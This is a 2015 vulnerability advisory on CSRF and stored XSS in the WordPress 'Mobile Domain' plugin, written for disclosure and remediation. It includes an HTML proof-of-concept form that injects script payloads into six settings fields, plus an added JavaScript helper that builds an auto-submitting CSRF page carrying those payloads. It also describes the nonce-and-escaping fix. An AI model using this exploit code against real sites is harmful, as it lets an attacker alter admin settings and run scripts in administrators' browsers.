Title: WordPress 'Mobile Domain' CSRF/XSS
Version: 1.5.2
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/mobile-domain/
Contacted WordPress: 2015/01/26

==========================================================
## Description:
==========================================================

Redirect WordPress blog from desktop domain to mobile subdomain and create Mobile XML Sitemap.

==========================================================
## CSRF:
==========================================================

The request that saves the plugin's admin settings is not protected by an anti-CSRF token (a WordPress nonce). An attacker can therefore change the plugin's settings by tricking a logged-in admin into visiting a crafted page that submits the settings form; the browser attaches the admin's session cookies and WordPress accepts the request.

==========================================================
## Stored XSS:
==========================================================

Settings data submitted from the admin page is stored unsanitized and echoed back on the plugin's admin page without output encoding. An attacker who can set these fields (directly, or through the CSRF above) can store JavaScript that runs in the browser of any admin who later opens the settings page.

PoC: Log in as admin and submit this form (the payloads are wrapped in single quotes so that the leading double quote and the script tag are actually submitted as the field value, rather than terminating the value attribute in the PoC page itself):

<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=mobile-domain&wpmd_action=add-domain">
  <input type="text" name="domain" value='"><script>alert(1);</script>'><br />
  <input type="text" name="text" value='"><script>alert(2);</script>'><br />
  <input type="text" name="font" value='"><script>alert(3);</script>'><br />
  <input type="text" name="fontcolor" value='"><script>alert(4);</script>'><br />
  <input type="text" name="color" value='"><script>alert(5);</script>'><br />
  <input type="text" name="padding" value='"><script>alert(6);</script>'><br />
  <input type="submit">
</form>

Each stored value closes the value="..." attribute of the settings input it is rendered into and injects a script element, which executes when the settings page is viewed.

==========================================================
## Solution
==========================================================

No fix available at the time of publication. Until a fixed version is released, deactivate or remove the plugin.
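The following is an added example, not code from the advisory authors or from the plugin. It ties the CSRF and Stored XSS sections together: it generates the attacker page that auto-submits the settings form on behalf of a logged-in admin, and it shows why the stored value becomes live markup on the settings page. The action URL and field names are taken from the PoC form above (the host stays the [URL] placeholder); escapeAttr, buildCsrfPage, renderUnescaped and renderEscaped are helper names chosen for this example, and renderUnescaped/renderEscaped are a stand-in for the plugin's output, not its actual template code.

```javascript
// Added example (not part of the original advisory or the plugin).
// Assumptions: the target URL and field names from the PoC; helper names are ours.

// Escape a string for use inside a double-quoted HTML attribute. This is
// needed on the attacker page so the XSS payload survives as the submitted
// value (quoting the payload with the same double quotes that delimit the
// attribute truncates the value to the empty string). The same escaping on
// the plugin's output side is what WordPress's esc_attr() provides.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Settings handler from the advisory; [URL] is the placeholder host.
const TARGET =
  "http://[URL]/wp-admin/options-general.php?page=mobile-domain&wpmd_action=add-domain";
const FIELDS = ["domain", "text", "font", "fontcolor", "color", "padding"];

// One distinct stored-XSS payload per settings field, as in the PoC.
function xssPayloads() {
  const out = {};
  FIELDS.forEach((name, i) => {
    out[name] = `"><script>alert(${i + 1});</script>`;
  });
  return out;
}

// Build the CSRF page: a hidden form that submits itself as soon as the
// victim loads it. The browser sends the admin's WordPress session cookies
// with the POST, and the handler accepts it because no nonce is checked.
function buildCsrfPage(action, fields) {
  const inputs = Object.entries(fields)
    .map(([n, v]) => `<input type="hidden" name="${escapeAttr(n)}" value="${escapeAttr(v)}">`)
    .join("\n    ");
  return `<!doctype html>
<html><body>
  <form id="csrf" method="POST" action="${escapeAttr(action)}">
    ${inputs}
  </form>
  <script>document.getElementById("csrf").submit();</script>
</body></html>`;
}

// Stand-in for the vulnerable settings page: the stored value is echoed
// straight into a value="..." attribute, so the payload closes the
// attribute and the input tag and injects a live <script> element.
function renderUnescaped(name, stored) {
  return `<input type="text" name="${name}" value="${stored}">`;
}

// Stand-in for the hardened page: attribute-escaped output keeps the
// payload inert text inside the attribute.
function renderEscaped(name, stored) {
  return `<input type="text" name="${name}" value="${escapeAttr(stored)}">`;
}

// True if the markup contains a real script start tag (not an entity-encoded one).
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}
```

On the defensive side the plugin needs both halves of the fix: the settings handler must require a nonce (wp_nonce_field() in the form and check_admin_referer() before saving), which closes the CSRF, and every stored value must be escaped with esc_attr() when rendered into the settings page and validated on input (for example with sanitize_text_field()), which closes the stored XSS. Either fix alone leaves the other issue in place.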